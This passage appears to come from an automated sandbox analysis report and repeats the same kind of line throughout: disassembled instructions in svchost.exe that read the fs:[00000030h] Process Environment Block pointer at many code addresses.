                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FA352 mov eax, dword ptr fs:[00000030h]7_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E388 mov eax, dword ptr fs:[00000030h]7_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E388 mov eax, dword ptr fs:[00000030h]7_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E388 mov eax, dword ptr fs:[00000030h]7_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325438F mov eax, dword ptr fs:[00000030h]7_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325438F mov eax, dword ptr fs:[00000030h]7_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03228397 mov eax, dword ptr fs:[00000030h]7_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03228397 mov eax, dword ptr fs:[00000030h]7_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03228397 mov eax, dword ptr fs:[00000030h]7_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E3F0 mov eax, dword ptr fs:[00000030h]7_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E3F0 mov eax, dword ptr fs:[00000030h]7_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E3F0 mov eax, dword ptr fs:[00000030h]7_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032663FF mov eax, dword ptr fs:[00000030h]7_2_032663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EC3CD mov eax, dword ptr fs:[00000030h]7_2_032EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032383C0 mov eax, dword ptr fs:[00000030h]7_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032383C0 mov eax, dword ptr fs:[00000030h]7_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032383C0 mov eax, dword ptr fs:[00000030h]7_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032383C0 mov eax, dword ptr fs:[00000030h]7_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B63C0 mov eax, dword ptr fs:[00000030h]7_2_032B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322823B mov eax, dword ptr fs:[00000030h]7_2_0322823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234260 mov eax, dword ptr fs:[00000030h]7_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234260 mov eax, dword ptr fs:[00000030h]7_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234260 mov eax, dword ptr fs:[00000030h]7_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322826B mov eax, dword ptr fs:[00000030h]7_2_0322826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B8243 mov eax, dword ptr fs:[00000030h]7_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B8243 mov ecx, dword ptr fs:[00000030h]7_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A250 mov eax, dword ptr fs:[00000030h]7_2_0322A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236259 mov eax, dword ptr fs:[00000030h]7_2_03236259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402A0 mov eax, dword ptr fs:[00000030h]7_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402A0 mov eax, dword ptr fs:[00000030h]7_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov ecx, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E284 mov eax, dword ptr fs:[00000030h]7_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E284 mov eax, dword ptr fs:[00000030h]7_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B0283 mov eax, dword ptr fs:[00000030h]7_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B0283 mov eax, dword ptr fs:[00000030h]7_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B0283 mov eax, dword ptr fs:[00000030h]7_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402E1 mov eax, dword ptr fs:[00000030h]7_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402E1 mov eax, dword ptr fs:[00000030h]7_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402E1 mov eax, dword ptr fs:[00000030h]7_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03260124 mov eax, dword ptr fs:[00000030h]7_2_03260124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA118 mov ecx, dword ptr fs:[00000030h]7_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA118 mov eax, dword ptr fs:[00000030h]7_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA118 mov eax, dword ptr fs:[00000030h]7_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA118 mov eax, dword ptr fs:[00000030h]7_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F0115 mov eax, dword ptr fs:[00000030h]7_2_032F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov eax, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov eax, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov ecx, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov eax, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov eax, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322C156 mov eax, dword ptr fs:[00000030h]7_2_0322C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C8158 mov eax, dword ptr fs:[00000030h]7_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236154 mov eax, dword ptr fs:[00000030h]7_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236154 mov eax, dword ptr fs:[00000030h]7_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03270185 mov eax, dword ptr fs:[00000030h]7_2_03270185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EC188 mov eax, dword ptr fs:[00000030h]7_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EC188 mov eax, dword ptr fs:[00000030h]7_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B019F mov eax, dword ptr fs:[00000030h]7_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B019F mov eax, dword ptr fs:[00000030h]7_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B019F mov eax, dword ptr fs:[00000030h]7_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B019F mov eax, dword ptr fs:[00000030h]7_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A197 mov eax, dword ptr fs:[00000030h]7_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A197 mov eax, dword ptr fs:[00000030h]7_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A197 mov eax, dword ptr fs:[00000030h]7_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_033061E5 mov eax, dword ptr fs:[00000030h]7_2_033061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032601F8 mov eax, dword ptr fs:[00000030h]7_2_032601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F61C3 mov eax, dword ptr fs:[00000030h]7_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F61C3 mov eax, dword ptr fs:[00000030h]7_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov eax, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov eax, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov eax, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov eax, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A020 mov eax, dword ptr fs:[00000030h]7_2_0322A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322C020 mov eax, dword ptr fs:[00000030h]7_2_0322C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6030 mov eax, dword ptr fs:[00000030h]7_2_032C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4000 mov ecx, dword ptr fs:[00000030h]7_2_032B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E016 mov eax, dword ptr fs:[00000030h]7_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E016 mov eax, dword ptr fs:[00000030h]7_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E016 mov eax, dword ptr fs:[00000030h]7_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E016 mov eax, dword ptr fs:[00000030h]7_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325C073 mov eax, dword ptr fs:[00000030h]7_2_0325C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232050 mov eax, dword ptr fs:[00000030h]7_2_03232050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6050 mov eax, dword ptr fs:[00000030h]7_2_032B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C80A8 mov eax, dword ptr fs:[00000030h]7_2_032C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F60B8 mov eax, dword ptr fs:[00000030h]7_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F60B8 mov ecx, dword ptr fs:[00000030h]7_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323208A mov eax, dword ptr fs:[00000030h]7_2_0323208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0322A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032380E9 mov eax, dword ptr fs:[00000030h]7_2_032380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B60E0 mov eax, dword ptr fs:[00000030h]7_2_032B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322C0F0 mov eax, dword ptr fs:[00000030h]7_2_0322C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032720F0 mov ecx, dword ptr fs:[00000030h]7_2_032720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B20DE mov eax, dword ptr fs:[00000030h]7_2_032B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C720 mov eax, dword ptr fs:[00000030h]7_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C720 mov eax, dword ptr fs:[00000030h]7_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326273C mov eax, dword ptr fs:[00000030h]7_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326273C mov ecx, dword ptr fs:[00000030h]7_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326273C mov eax, dword ptr fs:[00000030h]7_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AC730 mov eax, dword ptr fs:[00000030h]7_2_032AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C700 mov eax, dword ptr fs:[00000030h]7_2_0326C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230710 mov eax, dword ptr fs:[00000030h]7_2_03230710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03260710 mov eax, dword ptr fs:[00000030h]7_2_03260710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238770 mov eax, dword ptr fs:[00000030h]7_2_03238770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326674D mov esi, dword ptr fs:[00000030h]7_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326674D mov eax, dword ptr fs:[00000030h]7_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326674D mov eax, dword ptr fs:[00000030h]7_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230750 mov eax, dword ptr fs:[00000030h]7_2_03230750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BE75D mov eax, dword ptr fs:[00000030h]7_2_032BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272750 mov eax, dword ptr fs:[00000030h]7_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272750 mov eax, dword ptr fs:[00000030h]7_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4755 mov eax, dword ptr fs:[00000030h]7_2_032B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032307AF mov eax, dword ptr fs:[00000030h]7_2_032307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032527ED mov eax, dword ptr fs:[00000030h]7_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032527ED mov eax, dword ptr fs:[00000030h]7_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032527ED mov eax, dword ptr fs:[00000030h]7_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BE7E1 mov eax, dword ptr fs:[00000030h]7_2_032BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032347FB mov eax, dword ptr fs:[00000030h]7_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032347FB mov eax, dword ptr fs:[00000030h]7_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323C7C0 mov eax, dword ptr fs:[00000030h]7_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B07C3 mov eax, dword ptr fs:[00000030h]7_2_032B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E627 mov eax, dword ptr fs:[00000030h]7_2_0324E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03266620 mov eax, dword ptr fs:[00000030h]7_2_03266620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03268620 mov eax, dword ptr fs:[00000030h]7_2_03268620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323262C mov eax, dword ptr fs:[00000030h]7_2_0323262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE609 mov eax, dword ptr fs:[00000030h]7_2_032AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272619 mov eax, dword ptr fs:[00000030h]7_2_03272619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F866E mov eax, dword ptr fs:[00000030h]7_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F866E mov eax, dword ptr fs:[00000030h]7_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A660 mov eax, dword ptr fs:[00000030h]7_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A660 mov eax, dword ptr fs:[00000030h]7_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03262674 mov eax, dword ptr fs:[00000030h]7_2_03262674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324C640 mov eax, dword ptr fs:[00000030h]7_2_0324C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C6A6 mov eax, dword ptr fs:[00000030h]7_2_0326C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032666B0 mov eax, dword ptr fs:[00000030h]7_2_032666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234690 mov eax, dword ptr fs:[00000030h]7_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234690 mov eax, dword ptr fs:[00000030h]7_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE6F2 mov eax, dword ptr fs:[00000030h]7_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE6F2 mov eax, dword ptr fs:[00000030h]7_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE6F2 mov eax, dword ptr fs:[00000030h]7_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE6F2 mov eax, dword ptr fs:[00000030h]7_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B06F1 mov eax, dword ptr fs:[00000030h]7_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B06F1 mov eax, dword ptr fs:[00000030h]7_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A6C7 mov eax, dword ptr fs:[00000030h]7_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6500 mov eax, dword ptr fs:[00000030h]7_2_032C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326656A mov eax, dword ptr fs:[00000030h]7_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326656A mov eax, dword ptr fs:[00000030h]7_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326656A mov eax, dword ptr fs:[00000030h]7_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238550 mov eax, dword ptr fs:[00000030h]7_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03238550 mov eax, dword ptr fs:[00000030h]
